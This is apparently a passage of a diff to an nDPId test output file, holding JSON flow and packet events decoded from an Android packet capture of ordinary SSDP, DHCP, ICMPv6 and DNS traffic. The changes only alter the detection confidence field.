+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"android.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454825628,"flow_last_seen":1582454825628,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454825628,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454825629,"flow_last_seen":1582454825629,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454825629,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1582454825629,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1582454825629,"pkt":"AQBef\/\/6xiwDYGpkCABFAACaWhcAAAERrJjAqAIB7\/\/\/+sjTB2wAhk51TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454825629,"flow_last_seen":1582454825629,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454825629,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454825629,"flow_last_seen":1582454825629,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454825629,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1582454826369,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1582454826369,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABItCAAAEARQDTAqAIBwKgC\/+EV4RUANNgcU3BvdFVkcDDcFXQoLlJiTAABAARIlcIDokHeIIm5eNggVkvVDJHA6KPmCng="} 01124{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1582454853081,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":552,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":552,"pkt_l4_len":518,"thread_ts_msec":1582454853081,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAIaAQwAAEAR8XbAqAIBwKgC\/0RcRFwCBr34eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAzMzA0MDI2MjQwMTMxNjcxMTI3MTc3MTQ1ODMyOTcxNTM2ODg0ODIsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODEwNTkxNzYwLCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAyODUyMTYwNywgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgOTk0Njk3NzMsIDcwNzk2MzY2ODgsIDE3Njk2NDMwNywgMTI1NTQwNTY2LCAxMDQ3NDI4MTg5LCA0NzE2MTkwMDQ4LCA1NDY3MTYzMDg4LCAxMTk1MDQ0MDcxLCA5Njg1MzIyNCwgMTc2MDk5NjMsIDY0NzgzMDM0NDAsIDUxMTcwNjY0MiwgNjI5Nzk1NTE4NCwgMTQxNTYyMDM1MF19"} 
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1582454856384,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1582454856384,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABIA+oAAEAR8GrAqAIBwKgC\/+EV4RUANNgcU3BvdFVkcDDcFXQoLlJiTAABAARIlcIDokHeIIm5eNggVkvVDJHA6KPmCng="} 00544{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454865794,"flow_last_seen":1582454865794,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1582454865794,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff9f:f627","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1582454865794,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":78,"pkt_l4_len":24,"thread_ts_msec":1582454865794,"pkt":"MzP\/n\/YnTGr2n\/Ynht1gAAAAABg6\/wAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAH\/n\/YnhwBLLgAAAAD+gAAAAAAAAE5q9v\/+n\/Yn"} 
-00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454865794,"flow_last_seen":1582454865794,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1582454865794,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff9f:f627","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454865794,"flow_last_seen":1582454865794,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1582454865794,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff9f:f627","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00535{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454865802,"flow_last_seen":1582454865802,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454865802,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 
00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1582454865802,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1582454865802,"pkt":"MzMAAAAWTGr2n\/Ynht1gAAAAACQAAQAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAHjDAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/n\/Yn"} -00596{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454865802,"flow_last_seen":1582454865802,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454865802,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00596{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454865802,"flow_last_seen":1582454865802,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454865802,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1582454866026,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1582454866026,"pkt":"MzMAAAAWTGr2n\/Ynht1gAAAAACQAAQAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAHjDAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/n\/Yn"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866407,"flow_last_seen":1582454866407,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454866407,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.16","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1582454866407,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454866407,"pkt":"TGr2n\/YnxiwDYGpkCABFAAFILXYAAP8RB83AqAIBwKgCEABDAEQBNN9OAgEGAO9+0loAAAAAAAAAAMCoAhDAqAIBAAAAAExq9p\/2JwAAAAAAAAAAAABMdWNhcy1pTWFjLmxvY2FsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQECNgTAqAIBMwQAAU4gAQT\/\/\/8AAwTAqAIBBgTAqAIB\/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866407,"flow_last_seen":1582454866407,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454866407,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.16","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} +00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866407,"flow_last_seen":1582454866407,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454866407,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.16","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866448,"flow_last_seen":1582454866448,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454866448,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1582454866448,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":114,"pkt_l4_len":60,"thread_ts_msec":1582454866448,"pkt":"MzMAAQACTGr2n\/Ynht1gBNipADwRAf6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAQACAiICIwA8Uc8B2OT+AAEADgABAAEl5RSOTGr2n\/YnAAMADA4ACMoAAAAAAAAAAAAIAAIAAAAGAAQAFwAY"} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866448,"flow_last_seen":1582454866448,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454866448,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866448,"flow_last_seen":1582454866448,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454866448,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 
00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1582454866538,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454866538,"pkt":"TGr2n\/YnxiwDYGpkCABFAAFILXcAAP8RB8zAqAIBwKgCEABDAEQBNNxOAgEGAO9+0loAAAAAAAAAAMCoAhDAqAIBAAAAAExq9p\/2JwAAAAAAAAAAAABMdWNhcy1pTWFjLmxvY2FsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqAIBMwQAAU4gAQT\/\/\/8AAwTAqAIBBgTAqAIB\/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866803,"flow_last_seen":1582454866803,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454866803,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1582454866803,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1582454866803,"pkt":"MzMAAAAWTGr2n\/Ynht1gAAAAACQAAf6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAEAQAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/n\/Yn"} 
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866803,"flow_last_seen":1582454866803,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454866803,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866803,"flow_last_seen":1582454866803,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454866803,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866803,"flow_last_seen":1582454866803,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454866803,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1582454866803,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1582454866803,"pkt":"MzMAAAACTGr2n\/Ynht1gAAAAABA6\/\/6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAAAChQAIygAAAAABAUxq9p\/2Jw=="} -00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866803,"flow_last_seen":1582454866803,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454866803,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866803,"flow_last_seen":1582454866803,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454866803,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1582454866894,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1582454866894,"pkt":"MzMAAAAWTGr2n\/Ynht1gAAAAACQAAf6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAEAQAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/n\/Yn"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867034,"flow_last_seen":1582454867034,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1582454867034,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1582454867034,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1582454867034,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA\/qSJAAEARDCrAqAIQwKgCAc7ZADUAKwPW+6YBAAABAAAAAAAAB2NhcHRpdmUFYXBwbGUDY29tAAABAAE="} 
-00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867034,"flow_last_seen":1582454867034,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1582454867034,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867034,"flow_last_seen":1582454867034,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1582454867034,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1582454867075,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1582454867075,"pkt":"TGr2n\/YnxiwDYGpkCABFAADPTgIAAEARprrAqAIBwKgCEAA1ztkAu4V++6aBgAABAAUAAAAAB2NhcHRpdmUFYXBwbGUDY29tAAABAAHADAAFAAEAABCKACoMY2FwdGl2ZS1jaWRyDG9yaWdpbi1hcHBsZQNjb20GYWthZG5zA25ldADALwAFAAEAAACCAA4LY2FwdGl2ZS1jZG7APMBlAAUAAQAAAVQAFAdjYXB0aXZlAWcHYWFwbGltZ8AawH8AAQABAAAAEwAEEf01ycB\/AAEAAQAAABMABBH9NdA="} 